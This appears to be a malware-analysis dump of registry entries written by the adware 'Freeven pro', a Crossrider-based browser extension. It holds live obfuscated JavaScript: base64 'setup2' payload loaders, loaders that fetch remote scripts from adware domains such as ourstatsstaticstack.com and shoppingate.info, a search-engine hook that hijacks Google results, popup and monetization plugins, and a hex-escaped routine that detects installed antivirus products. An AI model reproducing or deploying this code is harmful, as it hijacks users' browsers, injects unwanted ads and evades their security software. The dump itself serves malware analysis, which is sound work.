"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }"
[HKCU\Software\Freeven pro\Plugins\375]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\376]
"JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.datafastguru.info/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__,httpsUrl:https://inst.shoppingate.info/je6"
[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"
[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\Freeven pro\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"
[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Freeven pro\Plugins\200]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Freeven pro\Plugins\281]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/281.js"
[HKCU\Software\Freeven pro\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"
[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/184.js"
[HKCU\Software\Freeven pro\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/36.js"
[HKCU\Software\Freeven pro\Plugins\376]
"Name" = "loaderBackup"
[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/47.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;}6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Freeven pro\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars6"
[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "10"
[HKCU\Software\Freeven pro\Plugins\288]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\390]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/390.js"
[HKCU\Software\Freeven pro\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64:N6"
[HKCU\Software\Freeven pro\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Freeven pro\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }"
[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/46.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 A1 8E 10 A3 B2 48 6C 74 29 09 40 DD 97 B9 4E"
[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Freeven pro\Plugins\195]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/195.js"
[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,345,354,253,102,180,184,193,220,195,200,221,223,226,230,233,242,260,273,281,288,334,375,380,390,391,91,376"
[HKCU\Software\Freeven pro\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\Freeven pro\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Freeven pro\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\Freeven pro\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzd6"
[HKCU\Software\Freeven pro\Plugins\193]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }"
[HKCU\Software\Freeven pro\Plugins\391]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/391.js"
[HKCU\Software\Freeven pro\Plugins\260]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/260.js"
[HKCU\Software\Freeven pro\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"
[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "15"
[HKCU\Software\Freeven pro\Plugins\334]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/334.js"
[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"
[HKCU\Software\Freeven pro\Plugins\230]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/230.js"
[HKCU\Software\Freeven pro\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"
[HKCU\Software\Freeven pro\Plugins\334]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk2OTRhNTc1OTRjNTYwYzE3MWYxMjM2MTgxYjViNTY1NDQ2MGIxZjE2MTM1MDU4NTYwOTBjMTA1MjQ1MTUwNjA4MDQxNjAwMTkwYjBkNDUwMTBjMDc1ODBlMWYyYjBiMDEwZDNkNWE1OTQ2MTM1NDJiNGEwOTE4NWQwMDBiMWEwOTBkMWQwMzBkMjIwNjVlMzUyODNhM2UzYjM3MzAzOTJiMjcyZjI1MjYyZjM1MjkzMzM0MmIyNzM1Mjg1ZjBmMWIxMTBkMWYxMDFhMjkxODFkMDk0OTNiM2MyODMwMmMzOTI0MmIyNTMwMjEzMTM0MjEyYzNmMzkyZDNlMmQzYjIwMjQyNjI2MzUyODVmMDUxYTE3MTcwYTBlMGYwYjAzMTAwMzFhMzAwYTA2MDc1ZTM1MjgzYTNlM2IzNzMwMzkyYjI3MmYyNTI2MjUzYTM3MzcyYTJlMmYzNTIzMzAyMTMxM2IzYzRkMDMxMzFhM2UzZDUxMmIzYjIwMzkyZDMwMzkyNTMwMjgzMTM2M2MyYTMyMzMzNTNlM2QzMzJiNDIyYTI5MmIyMDU3MjgyNjJmMjYyYjMwMzgzMDJhMmUzMjJiMzMzZDJhMzAzZjIzMmYyNjMyMmIzMzIxMzcyNjM5M2QyYTJlMjgyNjRhMTUxNDEzMjUwMzBlMGY0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjUzMzNiM2QyZDJiM2EzYzMzMmI0MjEwMWUwMDJhMmU0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjEzYjNmMjcyZDJlMzIzZDMzMjczMTIxMzQyYjI3MzUyODViNDA3ZTQ0NDM0YjQyNDExYTFiMGMwYjFkMGEyYTBmNDA1OTRhNDQ0YTU4N2UxOQ==', 'bcjwyltdck'); }"
[HKCU\Software\Freeven pro\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\Freeven pro\Plugins\246]
"JavaScript" = "var _0x8f59=[""10""
[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Freeven pro\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA6"
[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Freeven pro\Plugins\345]
"Version" = "13"
[HKCU\Software\Freeven pro\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Freeven pro\Plugins\375]
